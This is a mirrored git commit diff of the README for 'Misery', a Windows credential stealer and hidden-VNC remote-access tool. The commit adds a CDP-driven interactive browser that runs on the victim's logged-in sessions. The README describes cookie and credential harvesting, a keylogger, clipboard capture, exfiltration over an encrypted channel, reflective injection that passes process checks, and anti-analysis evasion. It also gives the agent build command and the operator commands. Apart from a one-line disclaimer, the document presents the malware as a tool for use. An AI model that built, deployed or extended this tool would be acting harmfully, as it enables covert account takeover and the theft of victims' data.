mirror of
https://git.churchofmalware.org/JYenn/Misery
synced 2026-09-22 05:27:07 +00:00
docs: correct session table for CDP-rendered interactive browser; tidy hvnc code
This commit is contained in:
@@ -9,6 +9,7 @@
|
||||
HVNC inspired by Ek0m's research, rebuilt on top of the Misery stealer.
|
||||
|
||||
- Hidden desktop (`hvnc start`): run any app on a hidden desktop and watch it live
|
||||
- Interactive browser (`hvnc launch chrome`): full Chromium with the victim's logins, driven over CDP in the view
|
||||
- Ghosted browser (`ghost <url>`): real Chrome/Edge session using the victim's cookies and logins
|
||||
- Credential and app-session harvesting (Misery stealer pipeline)
|
||||
- Browsers: Chrome, Edge, Brave, Opera, Opera GX, Firefox
|
||||
@@ -27,7 +28,7 @@ Educational/research use only. Run only on systems you own or have written permi
|
||||
|
||||
## Operator view
|
||||
|
||||
The console's live hidden-desktop feed, streamed from the agent and rendered in the view window:
|
||||
The console's live session feed (hidden desktop, or CDP-rendered browser while one is launched), streamed from the agent and rendered in the view window:
|
||||
|
||||
<p align="center">
|
||||
<img src="MiseryLiveOperatorView.png" alt="Misery operator view" width="1000">
|
||||
@@ -41,13 +42,16 @@ The console's live hidden-desktop feed, streamed from the agent and rendered in
|
||||
|
||||
## Which session to use
|
||||
|
||||
| | Ghosted session (`ghost <url>`) | Hidden desktop (`hvnc start`) |
|
||||
|---|---|---|
|
||||
| Profile | Snapshot copy of the victim's profile (deleted on stop) | Victim's real, live profile |
|
||||
| Browser | Chrome / Edge only | Any app + full desktop (explorer + Start menu) |
|
||||
| Collides with open browser? | No | Yes (profile lock / two-instance conflict) |
|
||||
| Writes back to profile? | No | Yes (history, cookies, sign-outs persist) |
|
||||
| Use when | Authenticated browser session only | Full hidden desktop or non-browser app |
|
||||
| | Ghost automation (`ghost <url>`) | Hidden desktop (`hvnc start`) | Interactive browser (`hvnc launch`) |
|
||||
|---|---|---|---|
|
||||
| What you see | nothing, it runs scripted over CDP | full desktop capture (GDI apps) | page viewport, CDP-rendered |
|
||||
| Profile | snapshot copy of the victim's profile (deleted on stop) | apps only; browsers get a snapshot copy | snapshot copy (deleted on stop) |
|
||||
| Browsers | Chrome / Edge | any app | Chrome / Edge / Brave / Opera via CDP; Firefox & IE on the desktop |
|
||||
| Collides with open browser? | No (its own copy) | No (browsers use a copy) | No (its own copy) |
|
||||
| Writes back to profile? | No | No (only the copy) | No (only the copy) |
|
||||
| Use when | you want the logged-in session handled without watching | you need the whole desktop or a non-browser app | you want to browse logged-in sites interactively |
|
||||
|
||||
Chrome-family browsers render through DirectComposition, which GDI capture cannot read on a hidden desktop, so `hvnc launch` of a Chromium browser switches the view to CDP-driven frames (in-process screenshots + trusted input). The view shows the page viewport, not the tab strip or address bar.
|
||||
|
||||
The stealer runs inside the browser via reflective injection when possible (passes process checks). Falls back to offline DPAPI in the agent process otherwise. Everything goes over one encrypted channel: agent streams frames/results, console forwards input and writes exfil to disk.
|
||||
|
||||
@@ -66,7 +70,7 @@ python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent
|
||||
.\build\agent.exe # connects
|
||||
```
|
||||
|
||||
Console is a terminal (`misery > ` prompt). Live view window opens for the hidden-desktop feed; input is forwarded.
|
||||
Console is a terminal (`misery > ` prompt). A live view window opens for the session feed (hidden desktop, or the browser view when `hvnc launch` starts Chrome/Edge/Brave/Opera); input is forwarded.
|
||||
|
||||
Commands: `steal`, `hvnc start | stop | launch [path]`, `ghost <url> | stop`, `keylog`, `clip`, `clear`, `exit` (type `help` for full list).
|
||||
|
||||
@@ -151,7 +155,7 @@ Tested on Chrome/Edge, Windows 10/11 x64.
|
||||
- `src/stealer` – Misery-derived sources
|
||||
- `src/hvnc` – hidden-desktop session
|
||||
- `src/ghost` – ghosted browser session
|
||||
- `src/browser` – CDP client that drives the ghost browser (Page/Input over WebSocket)
|
||||
- `src/browser` – CDP client that drives the ghost browser and the interactive browser view (Page/Input over WebSocket)
|
||||
- `src/rat` – keylogger + clipboard
|
||||
- `src/transport` – encrypted TCP framing, HTTPS beacon carrier, compression
|
||||
- `src/evasion` – indirect syscalls, anti-analysis, helpers
|
||||
|
||||
Reference in New Issue
Block a user